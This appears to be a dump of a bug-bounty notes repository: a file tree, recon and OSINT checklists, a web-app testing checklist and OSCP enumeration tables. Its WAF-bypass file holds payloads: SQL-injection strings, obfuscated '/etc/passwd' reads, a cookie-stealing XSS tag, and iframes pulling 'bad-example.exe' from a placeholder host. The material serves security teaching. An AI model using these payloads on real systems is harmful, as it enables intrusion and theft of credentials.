├── .DS_Store ├── Checklists ├── 100-web-exploits.md ├── CSRFTools.txt ├── FAQ.md ├── HuntingCheckList.md ├── Main app methodology.md ├── Multi target recon.md ├── NetworkHacking.drawio (1).png ├── OSINT.md ├── PEN-82804737-250323-0957.pdf ├── WAF-bypass-checklist.md ├── web app pentesting checklist.txt └── webAppSec.md ├── Misc └── TipsFromOurOverlordEdOverFlow.md ├── OSCP ├── ftpEnum.md ├── httpEnum.md ├── smbEnum.md └── sshEnum.md ├── Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3.md ├── Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3 ├── Screenshot_from_2021-03-11_15-19-23.jpeg ├── Screenshot_from_2021-03-11_15-23-14.jpeg ├── Screenshot_from_2021-03-11_15-29-50.jpeg ├── Untitled 1.png ├── Untitled 10.png ├── Untitled 11.png ├── Untitled 12.png ├── Untitled 13.png ├── Untitled 14.png ├── Untitled 15.png ├── Untitled 16.png ├── Untitled 17.png ├── Untitled 18.png ├── Untitled 19.png ├── Untitled 2.png ├── Untitled 3.png ├── Untitled 4.png ├── Untitled 5.png ├── Untitled 6.png ├── Untitled 7.png ├── Untitled 8.png ├── Untitled 9.png ├── Untitled.png ├── burpproject.png ├── dashboard.jpeg ├── deploy.jpeg ├── enter_to_procee.jpeg ├── h1.png └── heroku_terms.jpeg ├── README.md ├── RatFireWall ├── HorridAPIResponseFirewall │ ├── firewall.py │ ├── readme.md │ └── requirements.txt ├── firewall.py ├── moreSecureButNotFullySecure │ ├── proxy.py │ └── rules.py └── readme.md ├── Scripts ├── AutoSubdomainContentDiscXSSDalfox.py ├── BACProxy.py ├── BugBountyAutomator.py ├── EthsmartContractScanner.py ├── JS-CSRF-token-stealer.js ├── RatAPIChat │ ├── README.md │ ├── SQLiByAPISpec.py │ ├── main.py │ ├── readme.md │ ├── requirements.txt │ └── test.json ├── addUser.sh ├── autoScan.sh ├── goScan.go ├── gobuster.sh ├── initialScan.sh ├── portscan-result-basic-comparer.py ├── portscan-runtime-comparer.sh ├── resources.txt ├── scanMultipleDomains.sh ├── sqliList.sh ├── techStream.py ├── techStream │ ├── readme.md │ ├── resources.txt │ └── techStream.py ├── webapp_pentest.py ├── xssList.sh ├── zap-scan-order.sh └── zapstrikemap │ ├── readme.md │ └── strike.py ├── SubDomainEnum.md ├── THM_riddleme ├── TheBasicsOf ├── JavaScript.js └── JavaScriptExploits.js ├── XSS challenge room solutions ├── labs ├── xss │ ├── XSS1.php │ ├── XSS2.php │ ├── XSSDOM.php │ ├── XSSJS.php │ ├── XSSTAG1.php │ ├── XSSTAG2.php │ ├── XSSWL.php │ └── b └── xxe │ ├── a │ └── xxe.php ├── last_session.json ├── notes ├── Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae.md ├── Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae │ ├── 0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d.md │ ├── 0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d │ │ ├── Subdomain_Enum.png │ │ ├── Untitled 1.png │ │ ├── Untitled 2.png │ │ ├── Untitled 3.png │ │ └── Untitled.png │ ├── 1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869.md │ ├── 1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869 │ │ ├── Untitled 1.png │ │ └── Untitled.png │ ├── 2 Processing Our List Of Subdomain 6bf06bf770584289a8abd9e63c7bf2bd.md │ ├── 3 Subdomain flyover 5fe81be649ca4b849011d19ed4e53482.md │ ├── 4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a.md │ ├── 4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a │ │ └── Untitled.png │ ├── 98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e.md │ ├── 98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e │ │ ├── Untitled 1.png │ │ ├── Untitled 2.png │ │ └── Untitled.png │ ├── 99 List of tools for grabbing subdomains 788400d9c9d14a79b45c2fb1f6463692.md │ ├── A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817.md │ ├── A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817 │ │ ├── Nuclei_scanning.png │ │ ├── Nuclei_template_cheat_sheet.png │ │ └── Untitled.png │ ├── B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff.md │ ├── B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff │ │ └── vulnerability_scanning_(1).png │ ├── Untitled 1.png │ ├── Untitled 2.png │ ├── Untitled 3.png │ └── Untitled.png ├── Medium articles 772065d32a0a4425a2f6343adc86acb5.md ├── Medium articles 772065d32a0a4425a2f6343adc86acb5 │ ├── Are you a competitive hacker 383f929eda6c4206a762fa12c189b1b5.md │ ├── Bugbountyhunter com membership fbd44fccb0e648f6b04fe523218e7aad.md │ ├── Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b.md │ ├── Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b │ │ ├── 05C5F6F5-4262-4DFD-B4BA-8583D3051CDD.png │ │ ├── 603D9F12-65F0-4FFC-A2F7-58AF6B4BDEF0.png │ │ ├── 84591517-86DD-4538-84FA-23E99431FB1F.jpeg │ │ └── D973DC7A-046A-4223-A315-5B1A3AE06058.jpeg │ ├── How to become a hacker 2cecb0bb861f47e081a40246e1e43b47.md │ ├── How to handle failure c4edf74994974bb388eecaddc2210199.md │ └── Rat's mobile methodology 3adef0ef48cb4a479ac8bf1242be6957.md ├── Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a.md ├── Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a │ ├── Screenshot_from_2021-03-11_15-19-23.jpeg │ ├── Screenshot_from_2021-03-11_15-23-14.jpeg │ ├── Screenshot_from_2021-03-11_15-29-50.jpeg │ ├── Untitled 1.png │ ├── Untitled 10.png │ ├── Untitled 11.png │ ├── Untitled 12.png │ ├── Untitled 13.png │ ├── Untitled 14.png │ ├── Untitled 15.png │ ├── Untitled 16.png │ ├── Untitled 17.png │ ├── Untitled 18.png │ ├── Untitled 19.png │ ├── Untitled 2.png │ ├── Untitled 3.png │ ├── Untitled 4.png │ ├── Untitled 5.png │ ├── Untitled 6.png │ ├── Untitled 7.png │ ├── Untitled 8.png │ ├── Untitled 9.png │ ├── Untitled.png │ ├── burpproject.png │ ├── dashboard.jpeg │ ├── deploy.jpeg │ ├── enter_to_procee.jpeg │ ├── h1.png │ └── heroku_terms.jpeg ├── Rat's methodology e728e0cffd8d429e8f9a1317b05feadf.md ├── Rat's methodology e728e0cffd8d429e8f9a1317b05feadf │ ├── Untitled 1.png │ ├── Untitled 2.png │ ├── Untitled 3.png │ ├── Untitled 4.png │ ├── Untitled 5.png │ ├── Untitled 6.png │ └── Untitled.png ├── Vulnerability types d6487b7204244f159482be2dfb025fea.md └── Vulnerability types d6487b7204244f159482be2dfb025fea │ ├── BAC f2481eba6f7c4873b99b33739bb87033.md │ ├── Business logic flaws fa68e1871a024a6a95399dd4cc2718a0.md │ ├── CSRF 9bfcc03c9ce246a58d4815982e85bc18.md │ ├── CSRF 9bfcc03c9ce246a58d4815982e85bc18 │ ├── Untitled 1.png │ ├── Untitled 10.png │ ├── Untitled 11.png │ ├── Untitled 2.png │ ├── Untitled 3.png │ ├── Untitled 4.png │ ├── Untitled 5.png │ ├── Untitled 6.png │ ├── Untitled 7.png │ ├── Untitled 8.png │ ├── Untitled 9.png │ └── Untitled.png │ ├── Command injection f3446f65fdc9437b9c16ef96b33edc36.md │ ├── Command injection f3446f65fdc9437b9c16ef96b33edc36 │ ├── Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8.csv │ ├── Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8 │ │ ├── Name of current user beb0eeaa290a4e0aac30baa74c77087d.md │ │ ├── Network configuration 0cf0bc2bcef047ffa7cf5f6f3586dd02.md │ │ ├── Network connections 4676cf7a1c6242d8812e5477a55968f4.md │ │ ├── Operating system 8f3db179a87b4ec487f0386b866951c7.md │ │ └── Running processes c8592e3c8fe9486eab2b3122c43f318c.md │ ├── Untitled 1.png │ ├── Untitled 2.png │ └── Untitled.png │ ├── IDOR bb563c4b361c417cb6e3ec4268889a83.md │ ├── IDOR bb563c4b361c417cb6e3ec4268889a83 │ ├── Untitled 1.png │ └── Untitled.png │ ├── Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad.md │ ├── Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad │ └── Untitled_Diagram.png │ ├── SSRF 810a9009d00349518ca3c663f36100ea.md │ ├── SSRF 810a9009d00349518ca3c663f36100ea │ ├── Untitled 1.png │ ├── Untitled 2.png │ └── Untitled.png │ ├── Template injections 5633da87439b4f3b91e56feeb5a3332f.md │ ├── Template injections 5633da87439b4f3b91e56feeb5a3332f │ ├── CSTI c1ef3fe5df3a4f60a253596e37a2883a.md │ └── SSTI 5934bbc2430f4887bf5a460087454341.md │ ├── The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c.md │ ├── The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c │ ├── Untitled.png │ ├── V-Model.png │ ├── agile.png │ └── waterfal.png │ ├── XSS 0ad0878f33094ea6b8ac90e94c2b0dc2.md │ ├── XSS 0ad0878f33094ea6b8ac90e94c2b0dc2 │ ├── DOM XSS 5e31c327eca54f2c84e07fd5e46df88a.md │ ├── XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e.md │ └── XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e │ │ ├── Contexts 8aae6c796a57413099e7e4fdd0ef5709.csv │ │ ├── Contexts 8aae6c796a57413099e7e4fdd0ef5709 │ │ ├── ' ` e36ffb9f04e8440f8f5b47b7e69f5478.md │ │ ├── '); alert(); — 912c145846154ad2a89c539bd65f48ff.md │ │ ├── Breaks javascript functions c6e6ca69b5314fce978c5b2180a6485d.md │ │ └── Try to insert our own JS code 8a13b68fc9014164b4b0f4d929bc58fa.md │ │ ├── Techniques c0f9870e01324ea5b82e30269cc90503.csv │ │ ├── Techniques c0f9870e01324ea5b82e30269cc90503 │ │ ├── Attributes and tags 22b6bf65e8d14dd1a983ce484fe28460.md │ │ ├── Basic modifications a4f80788ef62415ea79e902e21da0760.md │ │ ├── Delimiters and brackers - 2 4a92e5bf6a90431999090ce0c9a35da3.md │ │ ├── Delimiters and brackers bbc14efa30bd42798308d674029f85a1.md │ │ ├── Eval() 6ea0bd9725f841a59ecc7da81ef27096.md │ │ ├── Event handlers 52045e13e76a4091a4cb5891e914cd2b.md │ │ ├── Event handlers 52045e13e76a4091a4cb5891e914cd2b │ │ │ └── Untitled.png │ │ ├── Use your imagination 3 6af362057ffa48158bc30b14979e51ad.md │ │ └── Using filtered words in filtered words 8aa56d798b6b422e986f2b2f630adab5.md │ │ ├── Types of XSS f9e208deac544d628aeb1522700c8975.csv │ │ └── Types of XSS f9e208deac544d628aeb1522700c8975 │ │ ├── Step 1 63421007b22b491b9290d2789df4c8e7.md │ │ ├── Step 2 2666a636c3b3495eb36f77acd72ac35c.md │ │ ├── Step 3 76a1d746254847bfa08a76e7bdd956d9.md │ │ ├── Test objectives 8e35744858e847a98f1ec476fc93d824.md │ │ ├── Untitled 46eae952fe8c43fd8a9cd9f71c1157c6.md │ │ └── Value reflection 8b259d50688247dfa63b88fe9d8efa33.md │ └── XXE dbfdda26a21f48c7b1056cb7693481bb.md ├── pentesting ├── GENERAL-21331969-241122-1908.pdf ├── GENERAL-33165-241122-1907.pdf ├── GENERAL-ADMINSOP-Distributedpentesting-241122-1908.pdf ├── GENERAL-Recurringtasksatstartofproject-241122-1906.pdf ├── GENERAL-SOP-Testplantemplate-241122-1907.pdf ├── GENERAL-SOP-WebEndpointReportTemplate-241122-1907.pdf ├── GENERAL-SOP-distributedpentesting-241122-1908.pdf ├── GENERAL-Serviceoptions-241122-1905.pdf ├── GENERAL-Servicesonoffer-241122-1905.pdf ├── GENERAL-TPL-Bugtemplate-241122-1908.pdf ├── GENERAL-TPL-Pentestingreport-241122-1908.pdf └── empty ├── preferences.json ├── recommended-targets └── main-app.md └── wordlists ├── Collection of wordlists.md ├── dir23.txt └── dirlist.txt /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/.DS_Store -------------------------------------------------------------------------------- /Checklists/CSRFTools.txt: -------------------------------------------------------------------------------- 1 | 1. Burp Suite Pro CSRF PoC Generator 2 | 2. CSRF PoC Generator: https://security.love/CSRF-PoC-Genorator/ 3 | 3. Generic CSRF Vulnerability Scanner: https://securityforeveryone.com/tools/csrf-vulnerability-scanner 4 | 4. XSRFProbe, CSRF automatic scanner: https://github.com/0xInfection/XSRFProbe 5 | 5. PROJECT FORGERY (An Automated CSRF Exploit Generator): https://github.com/haqqibrahim/Project-Forgery 6 | 6. CSRF testing guide: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery 7 | 7. CSRF Checklist: https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery 8 | -------------------------------------------------------------------------------- /Checklists/FAQ.md: -------------------------------------------------------------------------------- 1 | ## Table of contents 2 | - [Burp collaborator alternatives](#burp-collaborator-alternatives) 3 | - [I found website uses vulnerable version of JQuery, how do i exploit?](#i-found-website-uses-vulnerable-version-of-jquery-how-do-i-exploit) 4 | - [I found a CSRF issue on the login/logout/change password/change email/...](#i-found-a-csrf-issue-on-the-loginlogoutchange-passwordchange-email) 5 | - [How you find original IP and bypass the waf for port scanning ?](#how-you-find-original-ip-and-bypass-the-waf-for-port-scanning-) 6 | - [FAQ how do i 403 bypass?](#faq-how-do-i-403-bypass) 7 | - [why-test-for-idor-and-bac-by-replacing-the-jwt-token](#why-test-for-idor-and-bac-by-replacing-the-jwt-token) 8 | - [i found key x while hunting, is it valid?](#i-found-key-x-while-hunting-is-it-valid) 9 | 10 | ----- 11 | 12 | ## Burp collaborator alternatives 13 | - [Interactsh](https://t.co/nqFoFQxa8W?amp=1) 14 | - [webhook.site](https://webhook.site) 15 | - [Request bin](https://requestbin.com/) 16 | - [DNSBin](https://github.com/ettic-team/dnsbin) 17 | 18 | ## I found website uses vulnerable version of JQuery, how do i exploit? 19 | 20 | Great question!! 21 | - Understand what function is vulnerable in Jquery 22 | - Developers have to use THAT function in user controlleable way 23 | - Execute vulnerable function ENSURE developers did not apply filter 24 | 25 | ## I found a CSRF issue on the login/logout/change password/change email/... 26 | 27 | there is no CSRF token on the password reset/change password/login/logout 28 | 29 | Don't look for CSRF on functionality that needs any form of control over the users account. 30 | Pass change = you need current pass 31 | pass reset = you need token from the email adress of the victim unless you can get the server to send the token to you but you don't need CSRF then. 32 | Email change = pass required 33 | login/logout = why even? 34 | 35 | Impact only :)<3 36 | 37 | ## How you find original IP and bypass the waf for port scanning ? 38 | Cloudflare: https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/ 39 | 40 | ## FAQ how do i 403 bypass? 41 | https://github.com/Dheerajmadhukar/4-ZERO-3 !! <3 this is amazing!! 42 | 43 | ## Why test for IDOR and BAC by replacing the JWT token? 44 | You can not automated replacing the object ID's because on one project it will be userID and on the other the same variable will named accountID. Object ID name's often differ from project to project, JWT does not. 45 | 46 | I can show you the exact same impact from replacing the JWT by replacing the objectID and leaving the JWT alone BUTTTT 47 | 48 | - You might be changing random people's data 49 | - You might be testing in a production environment 50 | 51 | Note: If you use automation, you can only delete an object ones 52 | 53 | ## i found key x while hunting, is it valid? 54 | [Check out this keyhacks repo](https://github.com/streaak/keyhacks) 55 | -------------------------------------------------------------------------------- /Checklists/Multi target recon.md: -------------------------------------------------------------------------------- 1 | **Subdomain enumeration** 2 | - https://github.com/projectdiscovery/subfinder 3 | - https://dnsdumpster.com/ 4 | - https://www.shodan.io/ 5 | - https://github.com/fwaeytens/dnsenum/ 6 | - https://github.com/tomnomnom/assetfinder 7 | - https://crt.sh/ 8 | - amass 9 | - findomain 10 | 11 | **Checking if our subdomains are live** 12 | - https://github.com/tomnomnom/httprobe 13 | 14 | **(optional if you don't httprobe) Putting HTTPS in front of subdomains** 15 | - https://pastebin.com/3ByVDTx4 16 | 17 | **Subdomain flyover** 18 | - https://github.com/FortyNorthSecurity/EyeWitness 19 | - https://github.com/michenriksen/aquatone 20 | 21 | **Vulnerability scanners** 22 | - https://cirt.net/Nikto2 23 | - nuclei 24 | - https://github.com/heilla/SecurityTesting/blob/master/initialScan.sh 25 | 26 | **Directory brute forcing** 27 | - https://github.com/OJ/gobuster 28 | - Burp pro content discovery 29 | - https://github.com/ffuf/ffuf 30 | - https://github.com/maurosoria/dirsearch 31 | 32 | **Javascript analyses** 33 | - https://github.com/GerbenJavado/LinkFinder 34 | - https://github.com/lc/gau 35 | 36 | **Port scanning** 37 | - Masscan 38 | - Naabu 39 | - Nmap 40 | -------------------------------------------------------------------------------- /Checklists/NetworkHacking.drawio (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Checklists/NetworkHacking.drawio (1).png -------------------------------------------------------------------------------- /Checklists/OSINT.md: -------------------------------------------------------------------------------- 1 | Target: finding api keys, secrets, source code, subdomains, anything usefull 2 | 3 | # Resources 4 | - Google - https://google.com 5 | - Shodan - https://shodan.io 6 | - Censys - https://censys.io 7 | - Fofa - https://fofa.so 8 | - Dogpile - http://www.dogpile.com 9 | - Archives - https://archive.org 10 | - Google hacking db 11 | 12 | # Subdomain enum 13 | - Aquatone - https://github.com/michenriksen/aquatone 14 | - Sublister - https://github.com/aboul3la/Sublist3r 15 | - DNS dumpster - https://dnsdumpster.com/ 16 | - Facebook - https://developers.facebook.com/tools/ct 17 | 18 | # Email harvesting 19 | - [Theharvester](https://github.com/laramies/theHarvester) 20 | - [Prowl](https://github.com/nettitude/prowl) 21 | - [Haveibeenpwned](https://haveibeenpwned.com/) 22 | 23 | # Tips: 24 | - You can use the following boolean logical operators to combine queries: AND, OR, + and - 25 | - filetype: allows to search for specific file extensions 26 | - site: will filter on a specific website 27 | - intitle: and inurl: will filter on the title or the url 28 | - link:: find webpages having a link to a specific url (deprecated in 2017, but still partially work) 29 | 30 | ## Some examples: 31 | 1. NAME + CV + filetype:pdf can help you find someone CV 32 | 2. DOMAIN - site:DOMAIN may help you find subdomains of a website 33 | 3. SENTENCE - site:ORIGINDOMAIN may help you find website that plagiarized or copied an article 34 | 35 | # Chrome plugins to help with OSINT: 36 | - archive.is Button allows to quickly save a webpage in archive.is (more about this later) 37 | - Wayback Machine to search for archived page in the archive.org Wayback machine 38 | - OpenSource Intelligence gives a quick access to many OSINT tools 39 | - EXIF Viewer allows to quickly view EXIF data in images 40 | - FireShot to take screenshot quickly 41 | -------------------------------------------------------------------------------- /Checklists/PEN-82804737-250323-0957.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Checklists/PEN-82804737-250323-0957.pdf -------------------------------------------------------------------------------- /Checklists/WAF-bypass-checklist.md: -------------------------------------------------------------------------------- 1 | # Bypass checklist 2 | 3 | ## Generic checklist 4 | 5 | - [ ] Base64 encoding our payload (/?q=) 8 | - [ ] Backslashes in filtered words (https://site.com/index.php?file=cat /etc/pa\swd) 9 | - [ ] Quotes and * https://site.com/index.php?file=cat /etc/pa*swd 10 | https://site.com/index.php?file=cat /etc/pa**swd 11 | https://site.com/index.php?file=cat /etc/pa's'wd 12 | https://site.com/index.php?file=cat /etc/pa"s"wd 13 | - [ ] Wildcards (https://site.com/index.php?file=cat /e??/p????) 14 | - [ ] Replace spaces with / () 15 | - [ ] Custom tags ([https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=#x](https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=%3CCUSTOM+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x) ) 16 | - [ ] Using different language chars 17 | – e.g. ē instead of e 18 | 19 | ## Airlock Ergon 20 | 21 | ```php 22 | %C0%80'+union+select+col1,col2,col3+from+table+--+ 23 | ``` 24 | 25 | Every space here is replaced by a + and we have the %C0 and %80 url encoded values at the beginning of our attack vector.by [@Sec Consult](https://www.exploit-db.com/?author=1614) 26 | 27 | ## Barracuda 28 | 29 | ```php 30 | 31 |
Right-Click Here 32 | 33 | ``` 34 | 35 | A smart bypass making use of several tricks. The first line will use the onwheel event handler which is not filtered in Barracuda. We also have a very smart use of the url encoded characters on the third line. Great discoveries by [@WAFNinja](https://waf.ninja/) 36 | 37 | ```php 38 | GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US 39 | Host: favoritewaf.com 40 | User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) 41 | ``` 42 | 43 | We can see several smart tricks being used here by [@Global-Evolution](https://www.exploit-db.com/?author=2016) to achieve HTMLi 44 | 45 | ```php 46 | clickhere 47 | ``` 48 | 49 | And finally this amazing hacker makes smart use of the urlencoded value %0A which they place between every character of javascript. %0A translates to a linefeed. 50 | 51 | And many more over at [https://github.com/0xInfection/Awesome-WAF#known-bypasses](https://github.com/0xInfection/Awesome-WAF#known-bypasses) 52 | -------------------------------------------------------------------------------- /Checklists/web app pentesting checklist.txt: -------------------------------------------------------------------------------- 1 | CSRF: 2 | - Check if the token is present on any form it should be 3 | — ONLY Create, Update and Delete forms should have CSRF tokens 4 | - Server checks if the token length is correct 5 | - Server checks if parameter is there 6 | - Server accepts empty parameter 7 | - Server accepts responds without CSRF token 8 | - Token is not session bound 9 | 10 | 11 | JWT: 12 | - None-signing algorithm is allowed 13 | - Secret is leaked somewhere 14 | - Server never checks secret 15 | - Secret is easily guessable or brute-forceable 16 | 17 | Open redirect bypass: 18 | - evil.com/expected.com 19 | - Javascript openRedirects 20 | - Hidden link open redirects 21 | - Using // to bypass 22 | - https:evil.com (browser might correct this, filter might not catch it) 23 | - /\ to bypass 24 | - %00 to bypass (null byte) 25 | - @ to bypass 26 | - Parameter pollution (adding the same parameter twice) 27 | 28 | BAC 29 | - Test higher Priv functions should not be able to be executed by lower Priv user 30 | —Test ALL user levels 31 | — Test with authorise 32 | — JS Functions via developer console 33 | — Copy and paste of URL 34 | 35 | IDOR 36 | - Test between ALL tenants (companies hosted on one server/database. Can also be divisions of companies) 37 | — Test with authorise 38 | — JS Functions via developer console 39 | — Copy and paste of URL 40 | 41 | Captcha bypasses 42 | - Try change request method 43 | - Remove the captcha param from the request 44 | - leave param empty 45 | - Fill in random value 46 | 47 | LFI 48 | - Using // to bypass 49 | - /\ to bypass 50 | - \\ 51 | - %00 to bypass (null byte) 52 | - @ to bypass 53 | - URL encoding 54 | - double encodings 55 | 56 | RFI: 57 | - Using // to bypass 58 | - /\ to bypass 59 | - \\ 60 | - %00 to bypass (null byte) 61 | - @ to bypass 62 | - URL encoding 63 | - double encodings 64 | 65 | SQLi: 66 | - ‘“ to trigger 67 | — SQLmap 68 | 69 | XXE: 70 | - SVG files (images), DOCX/XLSX, SOAP, anything XML that renders 71 | - Blind SSRF, file exfiltration, command exec 72 | 73 | Template injections (CSTI/SST) 74 | - ${7*7} 75 | - If resolves, what templating engine 76 | - Try exploit by looking at manuals 77 | — URL encode special chars ({}*) 78 | — HTML entities 79 | — Double encodings 80 | 81 | XSS: 82 | - ‘“`> into every input field, the moment you register and start using the application 83 | - Enter a random value into every parameter and look for reflection 84 | - See what context reflection is in 85 | - Craft attack vector based on context 86 | — JS 87 | — HTML 88 | — HTML tag attribute 89 | — … 90 | — Url encode 91 | — HTML entities 92 | — Capital letters 93 | — BASE64 encode payload 94 | - CSP might be active 95 | — Try bypasses 96 | — See what is active and where script can be gotten from 97 | — Encode them in base64 98 | — Mascarade script as data 99 | 100 | 101 | SSRF 102 | - SSRF against server itself 103 | - SSRF against other servers on the network 104 | 105 | Command injection 106 | - Test every single parameter 107 | - Make a list of commands + command separators for target OS 108 | 109 | Admin panel bypass 110 | - Try referr header 111 | - Easy username/pass 112 | - Directory brute forcing for unprotected pages 113 | -------------------------------------------------------------------------------- /Misc/TipsFromOurOverlordEdOverFlow.md: -------------------------------------------------------------------------------- 1 | - Avoid using text files when creating lists with links. Use Markdown instead which makes the links clickable on GitHub. 2 | - Avoid writing the same functions across multiple shell files. For instance, I would recommend writing a single helper function (for -h) which you can import into every script and configure. 3 | - Whenever applicable, try to run things concurrently vs linearly. This is particularly relevant for http://scanMultipleDomains.sh. Now since I have mentioned http://scanMultipleDomains.sh, let me just add I would avoid writing single shell scripts for scanning several hosts vs a single host. You are better off writing you script so that it can process one or many hosts depending on the input. It makes it more user friendly. 4 | - Clean user input instead of expecting the user to know what the input should look like. For example, where the protocol is required, your tool should add the protocol if it's missing. Write a single function for this purpose that can be called everywhere. 5 | - Write the scripts in such a way that a user can add them to their /usr/bin/ or $PATH instead of having to create a copy in every target directory. There is no real need to have multiple copies of the same script everywhere on your machine. 6 | 7 | There is more that I would personally change, but this should be enough for you to play around with for now. 8 | -------------------------------------------------------------------------------- /OSCP/ftpEnum.md: -------------------------------------------------------------------------------- 1 | | Enumeration step | Comment | Usefull refference | Goal | 2 | |----------------------------|---------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------| 3 | | Enumerate Hostname | nmblookup -A [ip] | | | 4 | | List Shares | smbmap -H [ip/hostname] | | | 5 | | "" | echo exit \| smbclient -L \\\\[ip] | exit takes care of any password request that might pop up, since we’re checking for null login -L - get a list of shares for the given host | | 6 | | "" | nmap --script smb-enum-shares -p 139,445 [ip] | | | 7 | | Check Null Sessions | smbmap -H [ip/hostname] | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run to show new access | | 8 | | "" | rpcclient -U "" -N [ip] smbclient \\\\[ip]\\[share name] | -U "" - null session -N - no password This will attempt to connect to the share. Can try without a password (or sending a blank password) and still potentially connect. | | 9 | | Check for vulnerabilities | nmap --script smb-vuln* -p 139,445 [ip] | | | 10 | | Overal scan | enum4linux -a [ip] | Example output is long, but some highlights to look for: output similar to nmblookup check for null session listing of shares domain info password policy RID cycling output | | 11 | | Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh Check pcap | Run on server Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | | 12 | -------------------------------------------------------------------------------- /OSCP/httpEnum.md: -------------------------------------------------------------------------------- 1 | | Enumeration step | Comment | Usefull refference | Goal | | 2 | |-------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------|---------------------|----------------------|---| 3 | | Nikto for mapping the files | Nikto -host http(s)://ip:port/app | | Site mapping | | 4 | | Check the robots.txt file | If you can't access, maybe check for csrf | | Site mapping | | 5 | | Use BURP spider ability | | | Site mapping | | 6 | | Navigate to http://ip/~root | | | ??? | | 7 | | Use CURL to find out what webserver/app you are interacting with | | | Site mapping | | 8 | | Use gobuster to map out the directories | Check for txt,php,asp,jsp,aspx,sh | | Site mapping | | 9 | | Check the source code | Look for comments, versions, hidden links, … anything interesting | | | | 10 | | CEWL/John/hydra for password gen | | | Brute force | | 11 | | Check for vulnerable CMS and versions/ javascripts | | | Injection | | 12 | | If login page: Check for default credentials | Search google to find default credentials Admin/admin Try combinations of the words on the website | | injection | | 13 | | SQL injection | https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) | | Injection | | 14 | | Command injection in PHP | Php_exec() function makes syslevel calls | | Injection/execution | | 15 | | LFI/RFI | To execute payload | | Execution | | 16 | | File upload | Web.config, aspx,php,php3,pht,aspx,txt | | FTP | | 17 | | RCE | | | | | 18 | | Look at the config files | | | | | 19 | | Look for hidden data on image tags | | | | | 20 | | Cgi-bin file enum | | | | | 21 | -------------------------------------------------------------------------------- /OSCP/smbEnum.md: -------------------------------------------------------------------------------- 1 | | Enumeration step | Comment | Usefull refference | Goal | 2 | |----------------------------|---------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------| 3 | | Enumerate Hostname | nmblookup -A [ip] | | | 4 | | List Shares | smbmap -H [ip/hostname] | | | 5 | | "" | echo exit \| smbclient -L \\\\[ip] | exit takes care of any password request that might pop up, since we’re checking for null login -L - get a list of shares for the given host | | 6 | | "" | nmap --script smb-enum-shares -p 139,445 [ip] | | | 7 | | Check Null Sessions | smbmap -H [ip/hostname] | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run to show new access | | 8 | | "" | rpcclient -U "" -N [ip] smbclient \\\\[ip]\\[share name] | -U "" - null session -N - no password This will attempt to connect to the share. Can try without a password (or sending a 